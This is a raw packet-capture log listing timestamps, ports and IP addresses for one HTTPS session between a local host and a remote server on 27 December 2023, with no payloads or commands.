Dec 27, 2023 18:12:19.987534046 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.987540007 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987673044 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987689972 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987718105 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.987721920 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987745047 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.987833977 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987862110 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987888098 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.987891912 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987916946 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988132000 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988163948 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988190889 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988194942 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988229990 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988235950 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988256931 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988276958 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988286972 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988291025 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988317966 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988339901 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988372087 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988389015 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988430023 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988435030 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988456011 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988470078 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988518953 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988620043 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988631964 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988679886 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988683939 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988718033 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988754034 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988778114 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988779068 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988787889 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.988805056 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988825083 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988913059 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.988989115 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989002943 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989046097 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989054918 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.989058971 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989083052 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.989180088 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989197016 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989226103 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.989228964 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989257097 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.989303112 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989329100 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989350080 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989356041 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.989360094 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989393950 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.989603996 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989619017 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989646912 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989665985 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.989671946 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989692926 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.989758968 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989778996 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989809990 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.989813089 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.989842892 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.990004063 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990017891 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990050077 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.990053892 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990082026 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.990180969 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990211010 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990235090 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990246058 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.990250111 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990287066 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.990313053 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.990351915 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990365982 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990396976 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990412951 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.990417957 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990437984 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.990799904 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990817070 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990849972 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.990854025 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.990900993 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.019557953 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.020076036 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.031507015 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.031527996 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.031562090 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.031615019 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.031625032 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.031776905 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.031826973 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.031862974 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.031882048 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.031886101 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.031919003 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.032250881 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.032279015 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.032315016 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.032315016 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.032322884 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.032345057 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.032366037 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.032550097 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.032566071 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.032593966 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.032613993 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.032619953 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.032639980 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.032839060 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.032856941 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.032891989 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.032895088 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.032922029 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.033087015 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033114910 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033142090 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033144951 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.033149958 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033171892 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.033199072 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.033334970 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033349991 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033392906 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033396006 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.033400059 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033425093 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.033647060 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033663988 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033694983 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.033699036 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033725023 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.033859968 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033873081 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033912897 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.033915997 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033941031 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.033957958 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.033982992 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.034004927 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.034008026 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.034012079 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.034037113 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.034061909 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.034132957 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.034146070 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.034173012 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.034183979 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.034188986 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.034209013 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.073713064 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.073733091 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.073846102 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.073859930 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.124666929 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.144697905 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.144717932 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.144752026 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.144763947 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.144809008 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.144819975 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145019054 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145037889 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145068884 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.145072937 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145100117 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.145289898 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145323992 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145345926 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.145349026 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145356894 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145375967 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.145402908 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.145683050 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145698071 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145723104 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145740032 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.145750999 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.145761967 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.146089077 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.146105051 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.146137953 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.146142006 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.146179914 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.146425962 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.146437883 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.146471977 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.146476984 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.146490097 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.146792889 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.146810055 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.146831989 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.146836996 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.146857977 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.147161961 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147177935 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147207975 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.147211075 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147234917 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.147314072 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147339106 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147360086 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.147362947 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147371054 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147389889 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.147414923 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.147656918 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147670984 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147699118 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147702932 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.147706032 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147726059 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.147744894 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.147881985 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147896051 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147918940 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147929907 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.147933960 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.147972107 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.148164034 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148179054 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148209095 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148215055 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.148219109 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148238897 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.148329973 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148345947 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148369074 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.148372889 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148396015 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.148627996 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148641109 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148669958 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.148674965 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148690939 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.148847103 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148884058 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148917913 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.148925066 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.148937941 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149136066 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149159908 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149178982 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149182081 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149185896 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149204969 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149225950 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149399042 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149418116 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149447918 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149449110 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149456978 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149476051 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149492025 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149642944 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149656057 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149677038 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149687052 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149698019 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149702072 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149733067 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149789095 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149804115 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149833918 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149848938 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149852991 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.149873972 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.149998903 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150016069 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150038004 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150042057 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150057077 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150146961 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150168896 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150187016 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150192022 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150197029 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150219917 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150240898 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150302887 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150316000 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150366068 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150367975 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150373936 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150374889 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150402069 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150433064 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150445938 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150466919 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150489092 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150494099 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150526047 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150660038 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150674105 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150719881 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150719881 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150727987 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150747061 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150753975 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150775909 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150794029 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150798082 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150825024 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.150937080 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150965929 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.150993109 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151015043 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.151015043 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.151019096 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151050091 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.151197910 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151210070 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151283979 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151289940 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.151293993 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151313066 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.151540041 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151556015 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151583910 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.151587963 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151611090 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.151842117 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151865959 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151890993 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.151891947 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151901007 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.151917934 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.151941061 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.152009010 CET	443	49737	54.231.140.225	192.168.2.4
